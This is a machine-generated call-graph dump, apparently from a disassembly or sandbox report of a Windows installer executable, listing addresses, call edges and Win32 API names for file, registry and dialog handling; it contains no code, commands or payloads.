4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 